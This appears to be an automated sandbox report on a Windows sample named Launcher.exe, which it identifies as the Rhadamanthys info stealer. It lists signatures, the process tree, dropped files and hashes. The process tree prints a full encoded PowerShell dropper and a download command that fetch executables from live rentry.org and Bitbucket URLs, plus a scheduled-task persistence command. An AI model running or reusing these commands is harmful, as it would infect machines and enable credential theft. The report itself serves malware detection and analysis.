Overview

overview

10

Static

static

3

Launcher.exe

windows10-2004-x64

10

Launcher.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    36s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 13:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Launcher.exe

  • Size

    7KB

  • MD5

    b5e479d3926b22b59926050c29c4e761

  • SHA1

    a456cc6993d12abe6c44f2d453d7ae5da2029e24

  • SHA256

    fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

  • SHA512

    09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

  • SSDEEP

    192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score
10/10
rhadamanthysexecutionstealer

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/fb6688df07081a944ba4d480b80b21b779eefa19/lem.rar

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 46 IoCs
  • Suspicious use of SendNotifyMessage 45 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2616
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3976
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5028
        • C:\Users\Admin\AppData\Roaming\pmnjaehp.bxc0.exe
          "C:\Users\Admin\AppData\Roaming\pmnjaehp.bxc0.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5B6E.tmp\5B6F.tmp\5B70.bat C:\Users\Admin\AppData\Roaming\pmnjaehp.bxc0.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4632
            • C:\Windows\system32\chcp.com
              chcp 1251
              5⤵
                PID:2352
              • C:\Windows\system32\findstr.exe
                findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                5⤵
                  PID:4664
                • C:\Windows\system32\findstr.exe
                  findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                  5⤵
                    PID:4000
                  • C:\Windows\system32\findstr.exe
                    findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                    5⤵
                      PID:4492
                    • C:\Windows\system32\schtasks.exe
                      schtasks /query /tn "MyBatchScript"
                      5⤵
                        PID:2176
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        5⤵
                        • Creates scheduled task(s)
                        PID:1428
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3552
                        • C:\Windows\system32\reg.exe
                          reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                          6⤵
                            PID:3132
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:532
                          • C:\Windows\system32\reg.exe
                            reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                            6⤵
                              PID:4604
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/fb6688df07081a944ba4d480b80b21b779eefa19/lem.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
                            5⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:428
                      • C:\Users\Admin\AppData\Roaming\pmnjaehp.bxc1.exe
                        "C:\Users\Admin\AppData\Roaming\pmnjaehp.bxc1.exe"
                        3⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:1320
                  • C:\Windows\system32\taskmgr.exe
                    "C:\Windows\system32\taskmgr.exe" /4
                    1⤵
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:4924

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    Filesize

                    3KB

                    MD5

                    556084f2c6d459c116a69d6fedcc4105

                    SHA1

                    633e89b9a1e77942d822d14de6708430a3944dbc

                    SHA256

                    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                    SHA512

                    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    1KB

                    MD5

                    71444def27770d9071039d005d0323b7

                    SHA1

                    cef8654e95495786ac9347494f4417819373427e

                    SHA256

                    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

                    SHA512

                    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\5B6E.tmp\5B6F.tmp\5B70.bat
                    Filesize

                    6KB

                    MD5

                    62d6dc76d46f18df518a85ffa77fa2de

                    SHA1

                    2a5a9af3946ccfdc4f7eac894fa094bdf0d1f66b

                    SHA256

                    8fee639c4fa22551d43c8daf797bcb2269419c545447e0d5b43b66f54d69d728

                    SHA512

                    b81945c08b55b029dfca8b14cfd106270aacec5de3be70e151b95855c533c3d02b8b19257f3347da8c085248588b65f24c07bddbf291e951a33e26e7386b6f66

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_taomhupu.f5n.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\pmnjaehp.bxc0.exe
                    Filesize

                    93KB

                    MD5

                    d7e0458b48ff73bbc98182f86fc02bce

                    SHA1

                    58a8615c4d5b5b23fa8033effd7924df835bdcba

                    SHA256

                    b124e36b99efaf36522d87772480869dab738d9bbfc48f4ac87988a14981b8c4

                    SHA512

                    9a164e5e76f42b0d223f70d70999b24782999cf48ab3ace8064ffcd88f3b3ec667e5c00a59466218c0b86cf2f0b539fbf42f9252b0aca98de3e5f81e3b89bfd2

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\pmnjaehp.bxc1.exe
                    Filesize

                    355KB

                    MD5

                    c93d65bc0ed7ee88d266b4be759301f8

                    SHA1

                    8c0c415ba824737c61904676e7132094f5710099

                    SHA256

                    f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

                    SHA512

                    7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

                    Download Submit

                  • memory/1320-40-0x0000000000A60000-0x0000000000ACD000-memory.dmp

                    Filesize

                    436KB

                    Download

                  • memory/1320-61-0x0000000000A60000-0x0000000000ACD000-memory.dmp

                    Filesize

                    436KB

                    Download

                  • memory/1320-59-0x0000000076650000-0x0000000076865000-memory.dmp

                    Filesize

                    2.1MB

                    Download

                  • memory/1320-57-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

                    Filesize

                    2.0MB

                    Download

                  • memory/1320-56-0x0000000003EC0000-0x00000000042C0000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/1320-55-0x0000000003EC0000-0x00000000042C0000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3976-66-0x0000000076650000-0x0000000076865000-memory.dmp

                    Filesize

                    2.1MB

                    Download

                  • memory/3976-60-0x0000000000170000-0x0000000000179000-memory.dmp

                    Filesize

                    36KB

                    Download

                  • memory/3976-64-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

                    Filesize

                    2.0MB

                    Download

                  • memory/3976-63-0x00000000020B0000-0x00000000024B0000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/4308-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/4308-1-0x0000000000EE0000-0x0000000000EE8000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/4924-73-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-77-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-74-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-75-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-76-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-78-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-79-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-67-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-68-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-69-0x00000247A8690000-0x00000247A8691000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/5028-39-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5028-17-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5028-16-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5028-3-0x0000014F754D0000-0x0000014F754F2000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/5028-15-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5028-14-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5028-13-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

                    Filesize

                    10.8MB

                    Download